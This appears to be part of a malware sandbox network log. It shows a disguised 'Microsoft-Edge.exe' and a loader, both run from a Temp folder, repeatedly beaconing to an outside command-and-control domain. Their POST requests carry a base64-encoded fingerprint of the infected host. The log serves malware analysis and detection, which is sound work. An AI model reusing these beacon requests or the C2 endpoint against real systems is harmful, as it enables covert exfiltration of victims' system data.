                                                                                                                                                                2024-09-27 15:42:33 UTC1369INData Raw: 80 2d 68 3c 42 6b 30 27 ca 33 c1 f2 98 c1 55 16 64 69 f9 dd 97 0b d0 6c 13 3e 81 ae 03 ef 68 2b d5 9b a7 c2 29 56 23 e6 5e 4a bb 93 68 d9 9b 76 f3 31 3c a1 56 0f 32 5c 1f f9 a0 7c e0 dc 0d ef 45 8c 23 15 55 8a 42 a6 c9 bf 20 22 49 d4 cd 81 cb 7b 8b a2 6f a8 50 9d 42 88 2d 25 c5 fd 6b 70 24 83 db 19 d3 36 ca 2e 2a 71 41 1e 4b 78 4a 62 a9 46 e5 23 49 73 99 c2 a2 a2 a2 0f 33 e8 95 a8 2d 48 f6 78 b3 c1 92 94 8a e1 78 6e 51 72 5e 29 83 79 fa 06 25 1a 6d 03 0b 0a 08 06 21 42 1e f1 c2 8c 18 ae 93 63 48 a0 cd f9 1b ff ba 35 2e 61 9c 05 18 e7 43 d8 81 9b 39 e7 bb 57 e5 73 7b 69 5f 29 fa 69 35 33 df ab 11 dd e0 8b f0 00 06 12 98 60 21 ef 71 99 53 6e b7 8c ed 70 9f 02 dd 93 4d 08 a7 b3 14 61 a9 57 b4 1b a8 9a 0d 8b 0c 8f a6 7a c1 cc d1 e2 3b 91 58 9a 6d f7 66 33 bd
                                                                                                                                                                Data Ascii: -h<Bk0'3Udil>h+)V#^Jhv1<V2\|E#UB "I{oPB-%kp$6.*qAKxJbF#Is3-HxxnQr^)y%m!BcH5.aC9Ws{i_)i53`!qSnpMaWz;Xmf3
                                                                                                                                                                2024-09-27 15:42:33 UTC1369INData Raw: 89 42 21 bf 7e fa 20 9f 2d ea 50 0f 7c c0 bd 8b fc 8a f8 6a 10 72 03 46 a8 6a c4 5d fc ad 5f 4d e6 f2 b6 80 b9 25 fa 14 c9 6e 56 a4 67 46 6d 08 67 33 f3 9b ea ec 3b 84 a3 70 f0 5d f5 d7 b0 ad aa 23 28 3b d9 4d 33 a0 d5 e3 4c e5 b4 f5 6c d0 78 48 ed f4 90 4e f7 f2 77 95 9a e3 cb a7 9e 84 a5 2d 3b c0 32 77 ae 58 8e c0 62 c2 b2 0e e8 93 ef 40 84 c4 81 ff ef 79 79 c8 f2 27 0c 69 d7 18 0c 18 76 ac ac a1 25 83 53 1c 3e 92 18 cb 94 15 d4 e2 e5 a6 81 a1 0c e7 a0 5e 7d df f9 75 7d e3 5b a9 9d f4 54 eb 90 76 62 8f 52 0e 68 51 ed 73 2f d7 b9 94 50 40 90 03 fc bf 00 6b 4c a9 aa bd b8 cd 8b 06 19 a9 db c5 3b 16 41 e7 ca 82 a6 74 4f 76 2e ce 3e 82 49 ce ba 92 71 c2 10 7f ab 5d 99 02 12 c9 9d 35 b7 2d 98 bb 68 f0 c0 b2 42 6d f7 68 e6 54 f4 6d 05 7b 9d 44 b0 0e 25 ef ee
                                                                                                                                                                Data Ascii: B!~ -P|jrFj]_M%nVgFmg3;p]#(;M3LlxHNw-;2wXb@yy'iv%S>^}u}[TvbRhQs/P@kL;AtOv.>Iq]5-hBmhTm{D%
                                                                                                                                                                2024-09-27 15:42:33 UTC1369INData Raw: 58 39 1b 75 05 bf 2a 9f 03 f3 65 c0 a1 76 b2 ea 86 c1 44 7b e1 f4 2d 0e 85 b2 65 1a 4e e1 56 a4 fe 3c a6 f8 ae 95 50 2e 89 ac f5 22 93 20 19 af 23 19 da 04 1b ea 10 ff 96 fa 75 68 85 43 7d 66 39 db 1e 32 20 54 fb 65 8c 1d 45 68 c6 5f 99 b4 54 ae aa f9 20 66 46 57 21 2f e7 3d 4b f4 d9 30 57 66 9b 53 98 46 d2 ef 43 b2 ee 58 30 21 c7 23 5d 6d a3 d0 8e 17 78 a2 85 a1 b6 c5 e6 47 79 d5 45 ba f4 4a 8f 6c b9 14 4b 85 44 9d de 2a 80 2f e6 c8 08 52 6d 42 56 9f 82 3d 56 26 7d c9 48 c7 99 92 3a 2d 10 64 64 e8 f8 21 fe 18 5f 12 b3 92 fd 55 9f b8 41 28 15 cc 07 46 93 a7 69 97 46 f2 40 be 34 59 d3 91 59 26 d4 ef fc a6 94 b4 c1 1e 9f 1c b5 fb 2d 5f e6 0d 24 86 a8 22 c0 62 c2 7a 6a fa d5 f3 04 ec 11 5d 5c 83 14 9e 77 4c 5b da b6 fe 14 e8 b0 17 8e 7e 24 b0 88 5b d1 70 06
                                                                                                                                                                Data Ascii: X9u*evD{-eNV<P." #uhC}f92 TeEh_T fFW!/=K0WfSFCX0!#]mxGyEJlKD*/RmBV=V&}H:-dd!_UA(FiF@4YY&-_$"bzj]\wL[~$[p


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                36192.168.2.449801172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:33 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:33 UTC664INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:33 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=opoP4DzuuwJpMkaclWY1KA9BQ2B7pKIC72rfAxxwTYiR8gSxiMBaGoygYnUm%2FtIYjAcUXgceSwiGCi%2Fwg5K%2BhKGjk9%2F1lYOiQHMuTHu0CRpv0m5x%2Ba0%2F5Amq%2Fq2%2BW9%2Bi61FxYtp2tpL4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9ab11f3143d9-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-09-27 15:42:33 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                37192.168.2.449804172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:34 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:34 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:34 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XdX%2FR2pWOAehTUolumMVOO3Qu0T3pvETWDH4f0QR%2FbfKjHLILjdI3ktliN7JazwHv7XTzXn9NW3%2BelMfk%2BlS7CBjr%2BCteVOzaHKvE7qm6ZFq3UJ5RC25JUgwWn0GxPtvEDlXWFhvnOrq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9ab9fa294319-EWR
                                                                                                                                                                2024-09-27 15:42:34 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                38192.168.2.449803172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:34 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:34 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:34 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tW8eHXF8iB9%2B41UosqRhsgHIJCArfTt6rj2bvbt4QfGufB7G59AUM2m86JQeX%2BPXBxjH8wT4ogaoYS87OQXg2ZN7nRytKxT69iWphdeNc1UhDCJIdNR8JGL8UqzFUZcmVfzuOqfJuUW4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9aba9aff42dc-EWR
                                                                                                                                                                2024-09-27 15:42:34 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                39192.168.2.449806172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:35 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:36 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:36 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AAerZ0r5LcCMa8H85PctN%2Bj4Rw7HdmzBTGgM3PxeZhzVoR5uir84L2BXyBVdjft5TgSsjzBOT8fVzYlTt%2BV9Qa1IGrAUkU%2BQkiFhkV58fXHp5%2FAGl1ZqyRzh%2BmKthOnoj3LlTkQijWxz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9ac2ee6e420d-EWR
                                                                                                                                                                2024-09-27 15:42:36 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                40192.168.2.449807172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:36 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:36 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:36 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WfyMoPKsHoUR%2FZ9Vy%2FB9dISXeJCWmwn7csu9MNLGmDr6xJes4e3syjYzEL0Qf3Z0dSmX98x93kPxB7BKkmhb6vw%2B7coowFVwgbB9Z2NOFgVCPvRutTDW8KSIb83x1%2Bl%2FffNCgIGPxbRV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9ac3a9dc42ea-EWR
                                                                                                                                                                2024-09-27 15:42:36 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                41192.168.2.449810172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:37 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:37 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:37 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sAZzTJ6FUfW8RFv9IoSJDO%2FEzGwW9Rnde7Tf0A8SLAJg81cAF3W%2FTbYP2wjAtorWuHdi%2BBPYvkjxh7ac7i94ZmnpsKAe7O25tLD8eArQWmBetS0a3W529qQCovLSCQ7XcZ%2FcEtLC5aJR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9acb78897ca0-EWR
                                                                                                                                                                2024-09-27 15:42:37 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                42192.168.2.449811172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:38 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:38 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:38 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OsTIREZjw%2B8RjiN%2Byp%2FHbIpVT3s70%2B0ctjjiqXXU3LKGSr6PpQRvT3a4qSO83ScIzJxujDGvZln2FDPgABeX5hLh9%2Fzy184WfhN4d6k6wWO8XJCuFQ5frQDeGxspvUzt4PeHqG1JXA7k"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9ad07e728c65-EWR
                                                                                                                                                                2024-09-27 15:42:38 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                43192.168.2.449813172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:38 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:38 UTC630INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:38 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uvr9C2t6iW01nY2wLaTxf2ohTQHM6Z%2FCXU%2Bigtf68wFOpHnnyiDHAZfHdAQ9%2B25mdJgOzsawdr4JxA4GAuSFJSzFx24H%2F4S0e97bs%2BJBlIAS95K%2FD3gABsK91YEMzElbMKnMyM3uM%2FLH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9ad3af69433a-EWR
                                                                                                                                                                2024-09-27 15:42:38 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                44192.168.2.449815172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:39 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:39 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:39 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2GtOA5hNFXPP764TvEcg5zpJDXYudw7hVKTFm65KQZmSF9Qx1teQc3Trm3wc9BZE2HjaKwr7%2BUvopZh41IlMXcgp%2B%2FSqPgfyBjIOjRyUl62xF%2B8XufqfQ%2Fd3D5UtIZbhqAFtY8iUGgo4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9ada4ad50f46-EWR
                                                                                                                                                                2024-09-27 15:42:39 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
